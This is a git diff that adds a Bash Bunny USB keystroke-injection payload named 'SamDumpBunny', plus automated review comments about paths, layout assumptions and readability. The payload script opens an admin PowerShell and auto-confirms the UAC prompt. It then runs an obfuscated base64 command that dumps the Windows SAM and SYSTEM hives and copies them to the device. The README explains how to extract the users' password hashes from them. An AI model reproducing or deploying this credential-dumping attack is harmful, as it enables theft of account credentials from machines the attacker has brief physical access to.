diff --git a/payloads/library/credentials/SamDumpBunny/README.md b/payloads/library/credentials/SamDumpBunny/README.md new file mode 100644 index 00000000..7d023d7e --- /dev/null +++ b/payloads/library/credentials/SamDumpBunny/README.md @@ -0,0 +1,21 @@ +**Title: SamDumpBunny** + +

Author: 0iphor13
+OS: Windows
+Version: 1.0
+ +**What is SamDumpBunny?** +# +

SamDumpBunny dumps the users sam and system hive and compresses them into a zip file.
+Afterwards you can use a tool like samdump2 to extract the users hashes.

+ + +**Instruction:** +1. Plug in your Bashbunny and wait a few seconds + +2. Unzip the exfiltrated zip file onto your machine. + +3. Use a tool like samdump2 on your machine to extract the users hashes. + > `samdump2 BunnySys BunnySam` + +![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png) \ No newline at end of file diff --git a/payloads/library/credentials/SamDumpBunny/payload.txt b/payloads/library/credentials/SamDumpBunny/payload.txt new file mode 100644 index 00000000..cc3120e3 --- /dev/null +++ b/payloads/library/credentials/SamDumpBunny/payload.txt 
@@ -0,0 +1,53 @@ +#!/bin/bash +# +# Title: SamDumpBunny +# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes. +# Author: 0iphor13 +# Version: 1.0 +# Category: Credentials +# Attackmodes: HID, Storage + +LED SETUP + +Q DELAY 500 + +GET SWITCH_POSITION +DUCKY_LANG de + +Q DELAY 500 + +ATTACKMODE HID STORAGE + +#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING + +LED STAGE1 + +Q DELAY 1000 +RUN WIN "powershell Start-Process powershell -Verb runAs" +Q ENTER +Q DELAY 1000 + +#Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...) +Q ALT j +Q DELAY 250 + +Q DELAY 250 +Q STRING "powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAQgB1AG4AbgB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlAC" +Q DELAY 250 +Q STRING "AAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgA" +Q DELAY 250 +Q STRING "CIAJABQAFcARABcAEIAdQBuAG4AeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABCAHUAbgBuAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBu" +Q DELAY 250 +Q STRING "AFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEIAdQBuAG4AeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAcgBl" +Q DELAY 250 +Q STRING "AG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAYQBtADsAZQB4AGkAdAA=" +Q DELAY 250 +Q STRING ";mv SamDumpBunny.zip ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l" +Q DELAY 250 +Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';Start-Sleep 3;(New-Object -comObject Shel" +Q DELAY 250 +Q STRING "l.Application).Namespace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit" +Q DELAY 300 +Q ENTER + +LED FINISH \ No newline at end of file
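Review bot: in the README hunk, the screenshot link at the end points into `payloads/library/credentials/SamDumpCable/sam.png`, a different payload's directory, while this README lives under `SamDumpBunny/`; copy the image into this directory or fix the path. The Instruction section also omits two assumptions the payload hard-codes: a German keyboard layout (`DUCKY_LANG de`, `Q ALT j`, the comment says this must be adapted per language) and that the run depends on the UAC elevation prompt being approved (`-Verb runAs`), so step 1 should state both rather than leaving the OS/Version header as the only requirements line. Minor: the bare `#` line after `**What is SamDumpBunny?**` renders as an empty heading, and the file has no trailing newline.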
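Review bot: in the payload.txt hunk, the PowerShell passed with `-enc` is an opaque base64 blob spread over six `Q STRING` lines, so a reviewer cannot confirm from the diff that it does only what the header comment claims (dump the SAM and SYSTEM hives and archive them); add the decoded command as a comment above that block, the way the later plaintext `Q STRING` lines are already readable. Two smaller points: `GET SWITCH_POSITION` is read but never branched on, so drop it or comment why it is there, and the back-to-back `Q DELAY 250` / `Q DELAY 250` after `Q ALT j` is redundant. The file also ends without a newline after `LED FINISH`.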